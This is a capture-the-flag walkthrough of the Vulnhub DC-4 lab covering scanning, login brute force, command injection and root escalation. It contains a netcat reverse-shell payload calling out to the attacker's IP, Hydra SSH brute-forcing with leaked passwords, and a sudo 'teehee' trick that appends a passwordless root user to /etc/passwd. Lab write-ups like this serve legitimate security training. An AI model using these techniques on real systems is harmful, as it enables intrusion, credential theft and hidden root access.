DC-4 Walkthrough
Description from Vulnhub:
DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.
Scanning
I started with the good old port scanning phrase, which revealed 2 open ports.
root :: ~ » nmap -A -sC -sV -p- 192.168.42.160
Nmap scan report for dc-4 (192.168.42.160)
Host is up (0.00024s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 08:00:27:01:36:36 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelI didn’t find anything on the webserver, no directories, no files, nothing. There was nothing to go on, I decided to brute-force the login page. For this, I used my Windows machine because it’s a little bit faster. By the way, I used the rockyou-20.txt wordlist from the SecLists repository.
I managed to find a correct username and password combination. After I logged in, I was presented with a simple page, where we can run limited commands. As it turns out, it wasn’t limited at all…
I captured the request in Burp Suite and tried a simple command injection attack. It worked! I was able to print out the /etc/passwd file.
Executing arbitrary commands using Burp Suite.
Getting a shell
Using the following request body, I was able to get a connection back.
radio=ls+-l|nc -e /bin/bash 192.168.43.2 9898&submit=RunAfter that, I did my usual (and very basic) enumeration, which consist of looking into interesting directories and searching for low hanging fruits. In Jim’s home directory, I found a backups directory which contained an old-passwords.bak file. I quickly started an HTTP server using the python -m SimpleHTTPServer command. It's easy when Python is installed.
cd backups
ls
old-passwords.bak
python -m SimpleHTTPServerA quick wget and the file is mine.
root :: ~/Downloads » wget 192.168.43.160:8000/old-passwords.bak
http://192.168.43.160:8000/old-passwords.bak
Connecting to 192.168.43.160:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2047 (2.0K) [application/x-trash]
Saving to: ‘old-passwords.bak’old-passwords.bak 100%[==============================================>] 2.00K --.-KB/s in 0s(67.3 MB/s) - ‘old-passwords.bak’ saved [2047/2047]root :: ~/Downloads »
Brute-forcing with Hydra
We’ve got our password file, but I created a users.txt file with all three possible usernames because this way it’s easier to check the passwords against all users.
root :: ~ » hydra -L ~/Downloads/users.txt -P ~/Downloads/old-passwords.bak ssh://192.168.43.160
Hydra v9.1-dev (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.Hydra (https://github.com/vanhauser-thc/thc-hydra) starting
[DATA] max 16 tasks per 1 server, overall 16 tasks, 756 login tries (l:3/p:252), ~48 tries per task
[DATA] attacking ssh://192.168.43.160:22/
[STATUS] 99.00 tries/min, 99 tries in 00:01h, 660 to do in 00:07h, 16 active
[22][ssh] host: 192.168.43.160 login: jim password: jibril04
[STATUS] 106.00 tries/min, 318 tries in 00:03h, 441 to do in 00:05h, 16 active
[STATUS] 91.29 tries/min, 639 tries in 00:07h, 120 to do in 00:02h, 16 active
[STATUS] 92.38 tries/min, 739 tries in 00:08h, 20 to do in 00:01h, 16 active
1 of 1 target successfully completed, 1 valid passwords found
Alright… Jim didn’t change his password which is good for us.
Privilege Escalation
I found a shell script with SUID bit set, but it was a dead-end since Jim is not in the sudoers file. There was another file in Jim’s home directory called mbox which indicated that there might be other emails on the box. Sure enough, I found one in the /var/mail directory.
jim@sagemcom:/var/mail$ cat jim
From charles@dc-4
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4;
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Status: OHi Jim,I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.Password is: ^xHhA&hvim0ySee ya,
Charles
Yess… Another password! As you can see, the sender is Charles, so the password is probably his.
I continued the enumeration with Charles and found out that he can execute the /usr/bin/teehee command as root without the password.
charles@sagemcom:/var/mail$ sudo -l
Matching Defaults entries for charles on sagemcom:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser charles may run the following commands on sagemcom:
(root) NOPASSWD: /usr/bin/teehee
Root Access
I admit I’m not familiar with this program. I ran teehee --help to find out more about it. Unfortunately, the manpage isn’t available on the box.
jim@sagemcom:~$ teehee --help
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.-a, --append append to the given FILEs, do not overwrite
-i, --ignore-interrupts ignore interrupt signals
-p diagnose errors writing to non pipes
--output-error[=MODE] set behavior on write error. See MODE below
--help display this help and exit
--version output version information and exitMODE determines behavior with write errors on the outputs:
'warn' diagnose errors writing to any output
'warn-nopipe' diagnose errors writing to any output not a pipe
'exit' exit on error writing to any output
'exit-nopipe' exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.
What we can do with this program is to append the standard input into a file. You also overwrite the whole file, but I decided to be “stealthy” and simply add a new user with root privileges to the /etc/passwd file. Obviously, without a password for easier access. After that, just switch to that user and you’re root! Just like that!
charles@sagemcom:~$ sudo teehee -a /etc/passwd
infosecadventures::0:0:root:/root:/bin/bash
infosecadventures::0:0:root:/root:/bin/bash
^C
charles@sagemcom:~$ su infosecadventures
root@sagemcom:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
root@sagemcom:~#The Flag
Finally, the most important thing is to print out the root flag! 😄
root@sagemcom:~# cat flag.txtCongratulations!!!Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.If you enjoyed this CTF, send me a tweet via @DCAU7.
I had to removed the “Well Done” ASCII art because Medium messed it up…
Before You Go
Thank you for taking the time to read my walkthrough. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interest find it! + Feedback is always welcome! 🙏
